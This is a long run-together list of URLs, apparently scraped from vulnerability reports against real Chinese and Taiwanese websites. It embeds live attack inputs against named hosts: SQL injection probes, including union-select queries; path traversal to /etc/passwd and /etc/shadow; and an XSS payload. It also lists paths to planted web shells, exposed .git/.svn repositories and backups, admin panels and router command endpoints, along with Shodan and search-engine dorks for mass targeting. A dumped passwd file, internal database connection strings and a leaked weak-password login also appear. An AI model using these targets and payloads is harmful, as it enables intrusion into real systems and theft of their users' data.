url:http://chinabluechem.com.cn/ch/ss.asp http://www.hbav.gov.cn/index.html http://cosmetics.ifeng.com/weixin/product/try_detail?try_id=215 http://116.252.37.39:8000/index.html http://ec.yto.net.cn www.0356hua.com www.0356hua.com http://pc01.lib.ntust.edu.tw/ETD-db/ETD-search-c/view_etd?URN=etd-0128113-140846 http://153.0.69.228/。 http://153.0.69.228/web_shell_cmd.gch https://www.shodan.io/search?query=Mini+web+server+1.0+ZTE&1 http://www.lykygs.com http://www.lykygs.com/phpmyadmin/scripts/ http://www.lykygs.com/ticket/log.txt http://www.lykygs.com http://www.zoomeye.org/search?q=%22Mini%20web%20server%201.0%20ZTE%22&p=4&t=host http://153.0.72.9/web_shell_cmd.gch http://153.0.40.35/web_shell_cmd.gch http://153.0.70.63/web_shell_cmd.gch http://153.0.69.248/web_shell_cmd.gch http://58.215.50.44/FDA-PortEnt/PortEntLogin.html http://www.ccsa.org.cn/tc/index.php?tcid= http://xyb.cupl.edu.cn/AlumniL_LunTanPostM.aspx?fid=19 http://jx.17qibu.cn/login.html http://upload.yohobuy.com/.svn/entries http://wooyun.org/bugs/wooyun-2010-094365 http://www.hejia.cn/WebContent/NewPortal/Product/ProductSummary.aspx?newsType=109 http://houqin.sdkd.net.cn/news_ny.php?id=3008%20and%201=2 http://houqin.sdkd.net.cn/oa/login.php http://houqin.sdkd.net.cn/admin/oa/login.php http://www.hlbe.gov.cn http://www.517bx.com/index.php?a=search&featureId=1&m=product&typeId=0 http://www.wacai.com http://www.wacai.com/clientAppDownload.action filetype:action www.wacai365.net/finance/webmarket/recommend.action www.wacai.com www.wacai365.net www.wacai365.net http://www.wacai365.net/finance/webmarket/fundwebdetail.action?fundCode=202301 http://www.wacai.com/finance/webmarket/fundwebdetail.action?fundCode=202301 http://www.wacai365.net/finance/webmarket/635394720705098857.txt http://www.wacai.com/lulula.htm http://computer.upc.edu.cn/%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8E%E9%80%9A%E4%BF%A1%E5%B7%A5%E7%A8%8B%E5%AD%A6%E9%99%A2.rar http://zgws.xinhuanet.com/ http://www.zhongguowangshi.com 
http://www.zhongguowangshi.com/search.aspx?keyword=&typeid=201 site:moxiu.net http://moxiu.net/mxadminv3/index.php?do=Login http://chi.gogoblog.tw/index_t.php?ptype=ad&id=369 http://125.35.24.219/admin/tripDataFront/TripSearchAction_findDataCountToTrip.action http://202.108.65.163/login!navigator.jhtml http://www.cnoocengineering.com/ship01.aspx?column_id=10411&news_id=11803 http://218.106.133.143/sigma/Admin/Upload.asp http://www.gfxww.com/WebPage/Static/NewsView.aspx http://itha.nmciq.gov.cn/ http://itha.nmciq.gov.cn/include/showtcinfo.asp?tid= magazine.tcl.com/en/a.aspx root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh http://ugame.admin.ucdns.uc.cn/ www5.53kf.com/fenci/robot_fenci.php?cmd=CR&com_id=72000079&robot_id=971b5d68cdd2d141e86978b8afa02f21&q_id=1e278e4878dc8de61694c69482d20b6d&val=4 http://101.95.49.56:8080/EHotel/ jdbc:oracle:thin:@172.16.51.97:1521:jdet http://www.517na.com/Login/AccountsDetail.aspx?id=104 http://58.22.102.45/resin-doc/viewfile/?file=/doc/install.xtp http://58.22.102.45/resin-doc/viewfile/?file=index.jsp http://new.hbqj.gov.cn/config/config_global.php.bak http://kszx.jlu.edu.cn/admin/phpMyAdmin3431/ site:blog.zzedu.net.cn http://www.intelcbi.com/logon.php https://github.com/skybjf/ManageHotel/blob/2b46c0490a9795455be72cec31fe1da88b871584/WebRoot/WEB-INF/classes/hotel-config.properties 
jdbc:mysql://192.168.0.33:3306/weibo_climb?useUnicode=true&characterEncoding=utf8&characterSetResults=utf8&autoReconnect=true https://github.com/isme-jac/wl_product/blob/7119ea9d751e0fcba09c13adf08c822ba2c8a5c6/core/mail.php http://store.tdxinfo.com/tops-front-purchaser/facade/signin的登陆口用burp抓包 http://store.tdxinfo.com http://chem.nju.edu.cn:90/jlmc/photo/shit.asp http://sy.ifeng.com/member/login http://scm.hisense-plaza.com/scmsup/ http://dlhaier.com/ http://dlhaier.com/admin/login.asp http://218.28.234.62:8080/20150404020442.asp;.txt http://jwl.us.woniu.com/ http://www.hzlib.net/ http://www.jiemo.net/library/Home/index.php/School/show/id/3.html http://mobile.datanggroup.cn/Search.aspx?KeyWords=abc http://mobile.datanggroup.cn/Search.aspx?KeyWords=abc http://sqlmap.org http://115.28.35.81/home!resource.action http://support1.lenovo.com.cn/lenovo/wsi/modules/manage/getminfobysn.ashx?sn=e http://zhongyi.ifeng.com/login.html这个接口 URL:http://login.2345.com/find/checkCode http://login.2345.com/find/step4?forward=&from=phone&code=******直接进入重置密码环节。 http://www.w3.org/1999/xhtml http://www.bjcs.edu.cn/cn/index.php/Info/content/boardid/200/detail/204/contentid/1962 www.bilibili.com http://f.dangdang.com www.aizai.com http://game.g.pptv.com/guest/c/sq/api.php?action=logout http://user.g.pptv.com/login/cms/?gid=dgwm http://www.btghj.com.cn/ghj/cn/yggh_show.asp?newsid=755 http://www.fruitday.com http://007.maxthon.cn/login.php?ac= http://wooyun.org/bugs/wooyun-2015-095638/trace/2e0247bec4eb612930800968d5426f13 http://www.007.mx/fyws/ www.sfn.cn及 https://www.shodan.io/search?query=JDWP-HANDSHAKE https://github.com/IOActive/jdwp-shellifier http://service.eesc.com.cn/login/getAllexam.do?type=%B3%C9%C8%CB%B8%DF%BF%BC&servicename=%B3%C9%BC%A8%B2%E9%D1%AF(type参数和servicename参数都存在注入) http://service.eesc.com.cn/spot/spotMenu.do?type=toSelect&examTypeID=388(examTypeID) http://scrcu.21tb.com/els/html/course/course.courseInfo.do?courseId=PTC020104_scrcu&p= 
http://scrcu.21tb.com/els/html/course/course.fetchUserByStepRateJson.do?courseId=PTC020104_scrcu&type=WAIT&page.pageNo=1&page.pageSize=9¤t_app_id=&_= http://scrcu.21tb.com/cm/html/statistics/certStatistics.userList.do?current_app_id=&userName=&organizeId=&page.pageNo=25850&page.pageSize=1 http://scrcu.21tb.com/els/html/index.parser.do?id=0003 http://scrcu.21tb.com/bol/html/index.parser.do http://www.fqac.org/admin/ http://www.fqac.org/upload/admin/ http://60.172.210.251:7001//defaultroot/information_manager/informationmanager_upload.jsp http://10.6.125.45:8080/boardroom/index.jsp http://10.5.15.149:17173/Default.aspx http://oa.local.17173.com/ http://zhidao.local.17173.com/ http://reward.local.17173.com/ http://10.5.117.200/svn/enterprise/docs/ermp/设计文档/原型设计/角色与权限原型 http://10.5.117.200/svn/enterprise/docs/ermp/需求文档/产品需求规格说明书-企业信息化项目_基础模块(角色与权限).doc http://ermp.local.17173.com svn://**.**.**/MLDJClient/Version/Main/Project/Public/OperationMaintenance_ http://account.zuzuche.com/user/forgetpwd.php http://61.129.250.80/workorder-web/wod/onlineCompla/popupSkip.html?workorderId=99400&Rnd=0.1187884917751818 http://61.129.250.80/workorder-web/wod/onlineCompla/loadWorkOrder.html?workorderId=99401 http://61.129.250.80/workorder-web/wod/onlineCompla/popupSkip.html?workorderId=596187&Rnd=0.1187884917751818 http://mail.shxca.gov.cn/webmail/index.php?domain=shxca.gov.cn http://211.100.23.134/webmail/index.php?domain=tonghuimuju.com也是domain可以注入 http://rma.zte.com.cn/user/loginPage.html http://www.77.com.tw/admin/FCKeditor/editor/fckeditor.html www.77.com.tw\wuyun.txt http://www.cadeau.com.tw/wuyun.txt http://www.test.rivon.com.tw/wuyun.txt http://x.x.x.x:3333/shell.txt http://www.cast.gov.cn/public/china/?action=show&template=default&%20ClassId=18&producetid=2987 android:configChanges="keyboardHidden|orientation android:name="cn.jpush.android.ui.PushActivity android:theme="@android:style/Theme.Translucent.NoTitleBar android:name="cn.jpush.android.ui.PushActivity"/ 
android:name="android.intent.category.DEFAULT"/ android:name="com.sf.activity"/ http://shop.ali213.com/pay_go.php?id=1118 http://shop.ali213.com/pay_go.php?id=1118 http://vote.sports.tom.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://180.140.191.150:100 http://www.zxxs.unimip.cn/ocean/login.action http://www.takee.com.cn/product/?id=45 http://www.jnfdc.gov.cn/ http://www.jnfdc.gov.cn/install/install_params.jsp http://skleh.cams.ac.cn/show.php?contentid=557 http://tyjs.jsinfo.gov.cn/IOSI/backgroundServlet?method=toUserLogin inurl:hcnewlist2.aspx http://221.2.171.59:8000/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://222.135.109.70:8100/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://61.133.119.187:8089/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://221.2.149.47:8100//hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://222.135.76.147:8100/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://218.56.40.229:8000/hcnewlist2.aspxid=220&newsid=1260&deptid=51 http://123.134.189.60/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://60.217.72.17:8073/hcnewlist2.aspx?id=220&newsid=1260&deptid=51 http://i.nbdhyu.edu.cn/dcp/FileDownLoadloadServlet?module=storage&sName=fileDownload&upload_path=storage-path&folder_id=1837&downloadname=1423103413691.jsp&resource_id=2965 http://i.nbdhyu.edu.cn/dcp/upload_files/storage/1423103413691.jsp http://x.edu.cn/dcp/forward.action?path=/portal/portal&p=personalHomePage&user_id=amcxMDMxMzk= http://i.nbdhyu.edu.cn/dcp/FileDownLoadloadServlet?module=storage&sName=fileDownload&upload_path=storage-path&folder_id=1837&downloadname=1423103370399.jpg&resource_id=2964 http://i.nbdhyu.edu.cn/dcp/portal/gVarInit.jsp?p=wkHomePage&gId=null&user_id=null http://mpb.csu.edu.cn:811/fmen/usermgr/userAction!login.action http://mpb.csu.edu.cn:811/fmen/testcc.jsp http://112.124.34.223:8888/fwpt/login/loginAction!validateUser.action http://www.elanw.com/program/showadmin/showDetails.php?id=600 inurl:erjilist.aspx?id= 
http://60.217.72.17:8073/erjilist.aspx?id=220&newsid=1260&deptid=51 http://222.135.109.70:8100/erjilist.aspx?id=220&newsid=1260&deptid=51 http://61.133.119.187:8089/erjilist.aspx?id=220&newsid=1260&deptid=51 http://221.2.149.47:8100//erjilist.aspx?id=220&newsid=1260&deptid=51 http://222.135.76.147:8100/erjilist.aspx?id=220&newsid=1260&deptid=51 http://218.56.40.229:8000/erjilist.aspx?id=220&newsid=1260&deptid=51 http://123.134.189.60/erjilist.aspx?id=220&newsid=1260&deptid=51 http://my.55bbs.com/blog-4191686-317613-1.html http://www.seed.org.tw/ http://www.seed.org.tw/fckeditor/editor/dialog/fck_about.html http://www.seed.org.tw/fckeditor/editor/filemanager/upload/test.html http://*****.sinaapp.com/?u=0e55bf http://www.ab95569.com/user/myorderId.htm?orderId=20150204173203529571955&productType=8 http://rtb.bitsmart.com.cn/account.php?method=editAccount&id=81%20and%202=3%20union%20select%201,user%28%29,version%28%29,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20 http://**.**.**/symptom/medicinalsymptom_id=4481&scope=&reagent=2&brand=&cared=&otc= http://tieba.baidu.com/i/280830037 http://baike.baidu.com/ http://zhidao.baidu.com/ http://hi.baidu.com/%B3%A4%C9%B3%D3%D0%B5%C0%CD%D8%D5%B9/iho http://my.58.com/ http://www.baixing.com/fabu/?src=zhuce&city=changsha http://webmail.mail.163.com/js4/main.jsp?sid=VBKGUupwgOjpNINCCywwodOcF http://blog.sina.com.cn/u/2789274714 http://i.youku.com/u/home/ http://www.tudou.com/my/setting/regInterest.action http://www.ceconlinebbs.com/gl/%B0%A2%C0%EF%B0%CD%B0%CD%B9%AB http://www.08px.com/User/OInfoEdit.aspx http://www.51tie.com/member/index.php?SystemId=2&main=post_company.php http://www.douban.com/ http://cs.pxto.com.cn/User/main.asp http://www.csnis.com/ http://member.nowec.com/ http://www.denghuo.com/Reg_submit.asp http://admin.ev123.com/index.php http://users.net114.com/member_new/info.html http://www.qy6.com/myqy6/index.php http://changsha.liebiao.com/ http://www.417628.org/bbs/u.php?verify=651f121d 
http://cs.ganji.com/?ca_name=hao360_hao360_011_quanguoshouye http://www.365zhaosheng.com/user/index.asp?UName=csyoudao http://www.0731koubei.com/ http://baike.soso.com/(只能创建词条,而且写不了几个字) http://member.100ye.com/manage/manage.asp http://blog.sohu.com/ http://blog.163.com/csyoudao/manage/?from=newreg&entry=blog#m=0&t=0 http://ie.sogou.com/skins/?route=ucenter/signup/signupsuc&uid=nKfcoNiYk6KiaJeX http://my.tianya.cn/69987008#app=mobile_cellphone&action=smsopen http://user.qzone.qq.com/2473914322/infocenter http://www.szpxe.com/service/view/54507 www.3bbs.net http://reg.rednet.cn/member.asp http://dzh.mop.com/#/2010/right.jsp http://my.tianya.cn/ http://bbs.voc.com.cn/ http://www.xici.net/ http://bbs.hxoutdoor.com/ http://hiker.xout.cn/forumdisplay.php?fid=1547 http://bbs.hn87.com/ http://i.yinyuetai.com/i/8982483/blog/detail/809858 http://www.yigou100.cn/shop/display.action http://im.sina.com.cn/report.php?type=1&uid=1&retcode=0 http://61.153.210.85/ http://111.13.88.85:8090/login.htm www.igexin.com)推送系统【个信属新浪旗下产品】 http://waimai.baidu.com/trade/getpindanprice pindan_id:13219417460720277061_f725b2800ec89bba383e21d66492d3b38fca02fc_1423121999203 bdstoken:adf385c9d97f04040daf9df2e872232d display:json http://zhanzhang.baidu.com/robots/checkrule http://sxjy.sx.sgcc.com.cn/ http://www.rc168.com/OwenMange/PersonResume1.aspx?user=oscarliu1991 http://action.tenpay.com/wxts/ptrp.shtml?total_fee= http://action.tenpay.com/wxts/ptrp.shtml?total_fee=100000000000000000000000000&pay_uin= http://wap.fruitday.com/.git/config http://wooyun.org/bugs/wooyun-2014-076372 http://nsrs.swu.edu.cn/szyx/szyx/liberty/msgmanage.do?action=show_msg&id=1408932887660 http://rumor.nownews.com/rumor/rumor.php?eid=3072 http://rumor.nownews.com/informer/informer.php?mid=1575014 http://wenews.nownews.com/reporter_profile.php?mid=1550093 http://wenews.nownews.com/category.php?kid=1&sort=2 http://wenews.nownews.com/search_result.php?tid=765 http://tv.lenovo.com.cn/index.php?a=index&m=search 
http://tv.lenovo.com.cn/i.php http://tv.lenovo.com.cn/info.php app.staff.xdf.cn/admin/ http://app.staff.xdf.cn/data/uploads/2014/0825/16/53faf2443c0b8.php http://bx.hiad365.com/logout.action http://125.88.10.230:8080/jmx-console/ http://v.17173.com/u/114642817/videos/?state=pass&order=time&keywords=140801 http://wooyun.org/bugs/wooyun-2010-089653 http://app.wanda.cn/todo/test/addCheckUpdate.jsp inurl:hcnewlist2.aspx http://221.2.171.59:8000/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://222.135.109.70:8100/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://61.133.119.187:8089/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://221.2.149.47:8100//jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://222.135.76.147:8100/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://218.56.40.229:8000/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://123.134.189.60/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://60.217.72.17:8073/jqviewimg.aspx?id=220&newsid=1260&deptid=51 http://101.226.16.23 http://sytxmz.gov.cn/sytxmz/showmzdt.asp?id=1852 http://bcs.duapp.com/ehevaeaa/6.0.0.8037/VASetup_6.0.1.8037.exe http://bcs.duapp.com/ehevaeaa/6.0.0.8037/EAA_Setup_6.0.1.8037.exe http://218.9.185.207:8080/zhglpt/gkxx/xmgkxx/listXmgkxx.action inurl:wdviewimg.aspx?deptid= http://221.2.171.59:8000/wdviewimg.aspx?deptid=&id=267 http://222.135.109.70:8100/wdviewimg.aspx?deptid=&id=267 http://61.133.119.187:8089/wdviewimg.aspx?deptid=&id=267 http://221.2.149.47:8100//wdviewimg.aspx?deptid=&id=267 http://222.135.76.147:8100/wdviewimg.aspx?deptid=&id=267 http://218.56.40.229:8000/wdviewimg.aspx?deptid=&id=267 http://123.134.189.60/wdviewimg.aspx?deptid=&id=267 http://60.217.72.17:8073/wdviewimg.aspx?deptid=&id=267 http://www.whyouth.gov.cn/site/webback/Login.action shell:http://www.whyouth.gov.cn/site/1.jsp http://huodong.women.sohu.com/yigong/?type=1 http://mall.sina.com.cn http://www.aqjyw.gov.cn/include/content.php?id=552 http://112.94.224.247:8080/openimap/iportal/iportalIndex.action 
http://e.tcl.com.cn/ http://www.xnyy.cn/XNYYFore/Search_list.aspx?T=医疗咨询&K=12 https://61.144.226.121/por/login_psw.csp http://ebidding.lenovo.com.cn/backoffice/main1.aspx?type=back http://ebidding.lenovo.com.cn/Default.aspx http://ebidding.lenovo.com.cn/backoffice/ http://ebidding.lenovo.com.cn/backoffice/main.aspx要先登录第一个再来访问这个地址才行 http://i.jcloud.com/account http://batchhelper.sinaapp.com/ http://apps.weibo.com/guanjia http://app.weibo.com/detail/62A7lB?ref=appsearch http://app.weibo.com/detail/411VYf?ref=appsearch http://app.weibo.com/detail/3MnIiu?ref=appsearch http://app.weibo.com/detail/1iA37I?ref=appsearch http://app.weibo.com/detail/62A7lB?ref=appsearch http://app.weibo.com/detail/411VYf?ref=appsearch ttp://t.cn/Rhdd4Zp http://mall.sina.com.cn使用了同样架构 http://jifen.sina.com.cn http://ask.sdo.com/userinfo/myarticle?gameno=4 http://www.ztehotel.com/mobile/mLogin.aspx www.ztehotel.com http://op.cig.com.cn/ http://op.dma.cig.com.cn/op/lms/stat/xsts_info?id=0&aname=&success_push=3&failure_push=0&buxuyao_push=0&volume_push=0 http://op.dma.cig.com.cn/op/lms/stat/cfxs_info/?clue_id=82705 http://op.cig.com.cn/运行平台的信息 http://113.31.28.21:8002/ http://61.156.23.202:8080/ http://wooyun.org/bugs/wooyun-2015-094658 http://www.peiwo.cn/ https://api.peiwoapi.comaccount/forgetpassword?app=1&captcha=6位验证码&password=MD5加密密码&phone=手机号&version=151 http://www2.pccu.edu.tw/CRB/FckEditor/ http://esports.games.ifeng.com/lushi/search http://www.jzhbj.gov.cn/viewmessage1.aspx?leo=1&id=2221 http://file.y.sdo.com/ifile/wap.do?s=00058CF3C3443CA9BBAD32C7AAB6AC3D&r=DA62B885371E293827721F2FE94D3570&uuid=9261f6a7b9be44718ec625d1c9480e60.jpg http://klasqc.physics.sjtu.edu.cn/DetailInfo.php?id=78&num=22 http://shixi.189.cn/shixibao/ http://shixi.189.cn/shixibao/cp.php?ac=zhiwei_result_detail&ignore=1&jobid=15261 http://www.zyaic.gov.cn/include/Viewer/Viewer.php?aid=1 http://erp.fang.com/WebMain.aspx?aid=118 http://zdys.zju.edu.cn/news_info.php?id=960&classid=177 
http://www.douguo.com/mall/item/401 http://www.douguo.com/mall/item/184 http://ritu.cn/image/16814/lpt5.1.asp http://www.julaibao.com/web/login.aspx www.hua.com http://play.ifeng.com/?_c=puke&_a=login这个接口,属于凤凰游戏吧应该,是个德州扑克的登陆接口,无任何登陆限制 http://116.252.221.148:9001/SSQ/BrowseTestImage.aspx?testImageCode=11111111111431045001000301&studentCode=140123&imageCount=2&CouseText=%E8%AF%AD%E6%96%87&ClassName=%E9%AB%98%E4%B8%8014%E7%8F%AD http://sqlmap.org http://www.steelhome.cn/MemberLogin.php?urlstr=http://news.steelhome.cn/2004/08/24/n10160.html http://www.steelhome.cn/MessageShow.php?nid=10160 http://www.wzswsj.gov.cn/AdminCP/sbb_content.jsp?key=10 http://www.meitrip.cn http://www.meitrip.cn/private/GetGardenRoom.aspx?Hid=110602 http://www.tycts.com/LineList.aspx?title=2015 http://www.tycts.com/LineList.aspx?title=2015%27 http://www.tycts.com/LineList.aspx?title=2015%2527 http://927953.com/cn/bulletins/bulletinlist.aspx?id=834 http://sjj.ahhs.gov.cn/ www.norming.com.cn,看了系统开发商介绍,ESS与PSA好像是核心业务 http://act.dn.sdo.com/Honour/Handler/Handler.ashx?guid=172f4321-a5b1-4744-a077-2d3b8ccd46e3 http://act.xcb.sdo.com/project/singing/index.asp?page=1&modarea=1&modserver=1 http://baoku.baidu.com/search.php?word=test\x3c/title\x3e\x3cscript\x3ealert\x28\x27XSSSSS\x27\x29\x3c/script\x3e\x3ctitle\x3e http://www.whiterock.cn/web/GetPWD/GetPassword_1.aspx http://www.whiterock.cn/web/logout.aspx?ReturnUrl=http://www.whiterock.cn/_d14.htm http://www.whiterock.cn/web/logout.aspx?ReturnUrl=http://www.wooyun.org http://vip.fescoshanghai.com/benefit/sysarticle.aspx?arcid=132 http://magic.camera360.com/phpinfo.php http://share.camera360.com/phpinfo.php https://abroad.movie.camera360.com/phpinfo.php https://android.camera360.com/phpinfo.php https://geography.camera360.com/phpinfo.php https://hellocamera.camera360.com/phpinfo.php https://iphone.camera360.com/phpinfo.php https://magic.camera360.com/phpinfo.php https://mix.camera360.com/phpinfo.php https://movie.camera360.com/phpinfo.php 
https://pull.camera360.com/phpinfo.php https://sdk.camera360.com/phpinfo.php https://share.camera360.com/phpinfo.php https://suggest.camera360.com/phpinfo.php https://theme.camera360.com/phpinfo.php https://wp.camera360.com/phpinfo.php https://xiuse.camera360.com/phpinfo.php http://magic.camera360.com:6002/phpinfo.php http://pull.camera360.com:6002/phpinfo.php http://share.camera360.com:6002/phpinfo.php http://store.camera360.com:6002/phpinfo.php http://theme.camera360.com:6002/phpinfo.php http://www.5067.cc/,而且挂了很多个。 http://pharmyyouth.xmu.edu.cn/ http://123.135.104.38:90查询成绩的提问,感兴趣地点了一下问题相关,发现有人发布了一个弱口令(666666),简单测试了弱口令用户名123,以用户身份成功登入网上阅卷系统。 http://210.41.225.115:8888/cdzk/ http://210.41.225.115:8888/cdzk/project_content.jsp?project_id=201406124695 http://**.**.** http://wbm.whu.edu.cn/old/jcnr.php?mid=1&sid=33&id=1697%20and%201=2&tag=0 http://www.czrc.com.cn/wlzpjxh/WGR25.php?id=1698 http://www.189hao.cn/ http://www.189hao.cn/protected/ http://www.189hao.cn/game/ http://www.189hao.cn/test.php https://cms.camera360.com https://oa.camera360.com https://salt.camera360.com http://www.mylygport.com/qiehuan_ser.aspx http://www.mylygport.com/qiehuan_ser.aspx http://cert.tanet.edu.tw/prog/secrpt.php inurl:ShowBusinessList.aspx?ctype== http://221.2.171.59:8300/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://60.2.214.118:8088/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://121.17.2.52/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://rctdlz.cn/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://61.186.154.210:8088/ExtWebModels/WebFront/ShowBusinessList.aspx?ctype=0 http://www.sinobook.com.cn/forum/forum.cfm?iBookNo=691251 http://uem.3songshu.com/admin/good/good_sel.aspx?id=1161 http://222.66.48.92 http://222.66.48.92/loginAction.do http://xy.zhanchenggame.com//index.php?c=ajaxproxy&url=../../../../../../../../../../etc/passwd 
inurl:ShowProductList.aspx?ctype= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://60.2.214.118:8088/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://121.17.2.52/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://rctdlz.cn/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://61.186.154.210:8088/ExtWebModels/WebFront/ShowProductList.aspx?ctype=0 http://www.mylygport.com/admin.aspx http://www.mylygport.com/news_edit_dj.aspx http://www.mylygport.com/admin_imgnews.aspx http://www.mylygport.com/admin_lz_movie.aspx http://www.mylygport.com/admin_kxmovie.aspx http://www.mylygport.com/admin_xxh_gj.aspx http://www.mylygport.com/rwzf_xxh.aspx http://www.mylygport.com/rwzf_xxh_add.aspx http://www.mylygport.com/admin_mobile.aspx http://www.mylygport.com/admin_xt_yh.aspx http://www.mylygport.com/xm_message_edit.aspx http://222.204.208.4/ http://dxsb.qfnu.edu.cn http://182.129.150.10:8001 http://202.206.48.106 http://labch.cumt.edu.cn:81 http://dxsb.qfnu.edu.cn http://zz.sdlgzy.com http://hywl.nbu.edu.cn http://static.camera360.com/web/.svn/entries http://www.strongsoft.net/ pss.uestc.edu.cn/tasi/admin/authorize/authorize.asp?action=querylist http://old.makerlm.com/data/DatabaseBackup/ http://old.makerlm.com/public/ http://my.lotour.com/i//Goods/OrderLineDetail?orderid=53121 http://my.lotour.com/i//Goods/OrderLineDetail?orderid=13222 http://ganzizangzu.lotour.com/zj/1110702 http://my.lotour.com/mall/XiangQing.aspx?proid=220 inurl:homeLogin.action inurl:xxsearch.action http://ykt.wh.sdu.edu.cn/xykcx/managerNManager.action http://ecard.jxust.cn/managerNManager.action http://yktcx.njmu.edu.cn/managerNManager.action http://ecard.utsz.edu.cn/managerNManager.action http://ecard.ctbu.edu.cn/managerNManager.action http://www.fat.com.tw/index/index.aspx 
http://api.joyoung.com:8089/ia/appapi/menu?param={"op_action":"queryMenuDetail","sessionkey":"f7f8013d53664f66ae6bc887eb7843d0","menuid":"3d1bf3337b374a238d11c52a1992d4ab http://125.88.10.238/login.aspx http://news.baidu.com/jump.html?_xuid=http://xxx.com http://61.144.78.156/kks/kks_main.nsf?Opendatabase http://www.jys.gov.cn/more.php?p=0&c=109016 http://www.jys.gov.cn/videoMore.php?p=0&c=109003 http://www.jys.gov.cn/video.php?c=109003&i=248251a http://www.jys.gov.cn/hfrx.php?c=109006&i=245224a http://www.jiangyan.gov.cn/interface/jy_bbs_list.php?obj=ad_h2&c=5&n=3&t=46&tid=2 gov.cn/detail.php?c= gov.cn/detail_zt.php?c= http://www.jys.gov.cn/detail.php?c=101002&i=248464 http://huagang.gov.cn/detail.php?c=101203&i=205139 http://jsjygsj.gov.cn/detail.php?c=101004&i=246715 http://www.jsjyxzsp.gov.cn/detail.php?c=201811&i=49626 http://jykfq.gov.cn/detail.php?c=301631&i=210108 http://jysf.gov.cn/detail.php?c=222903&i=242453 http://www.jyjtj.gov.cn/detail.php?c=201701&i=231307 http://www.jsjyhrss.gov.cn/detail.php?c=101004&i=246591 http://www.jysagr.gov.cn/detail.php?c=101102&i=34411 http://www.jyhb.jiangyan.gov.cn/detail.php?c=211023&i=244371 http://jyws.gov.cn/detail.php?c=212001&i=220976 http://www.jydx.org.cn/detail.php?c=101101&i=49881 http://jslxz.cn/detail.php?c=201958&i=205507 http://www.jsjy.agri.gov.cn/detail.php?c=201904&i=222360 www.autob.cn会转到www.zoub.cn。 http://www.zoub.cn/index.php?r=users/Renewpass/email/MTYwNDA3OTM5OUBxcS*****= http://www.zoub.cn/index.php?r=users/Renewpass/email/c2VydmljZUBhdXRvYi5jbg== http://bbs.aliyun.com/read/227818.html?spm=5176.383338.3.4.7sY9qC http://app10.sznews.com/admin/login http://www.tna.com.tw/about/8_5_3.aspx?id=195 inurl:WebDefault3.aspx?CountryName= http://222.134.154.214:8001/WebDefault3.aspx?CountryName=南麻镇&level=2 http://123.134.189.60:8013/WebDefault3.aspx?CountryName=雪野旅游区&level=0 http://218.58.124.131:8003/WebDefault3.aspx?CountryName=高新区&level=1 http://221.2.149.47:8200/WebDefault3.aspx?CountryName=荫子镇&level=2 
http://jwh.tanljgzx.gov.cn/WebDefault3.aspx?CountryName=泰安市&level=0 http://61.133.119.187:8091/WebDefault3.aspx?CountryName=高技区&level=1 http://218.56.99.84:8003/WebDefault3.aspx?CountryName=昆仑镇&level=2 http://111.17.169.213:801/WebDefault3.aspx?CountryName=张店区&level=0 http://sn.whut.edu.cn/Admin/LoginAdmin.aspx http://pub2.whut.edu.cn/icea/civilsite/shownews.asp?articleid=5506%20and%201=1 http://pms.cig.com.cn/ http://wss.cig.com.cn/ http://www.fruitday.com inurl:sllistout.aspx?tname= http://jwh.tanljgzx.gov.cn/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://221.2.149.47:8200/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://123.134.189.60:8022/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba http://222.135.76.147:8200/ckq/sllistout.aspx?tname=%e8%b4%a2%e6%ba%90%e5%8a%9e%e4%ba%8b%e5%a4%84&CountryName=%e8%b4%a2%e4%b8%9c%e7%a4%be%e5%8c%ba 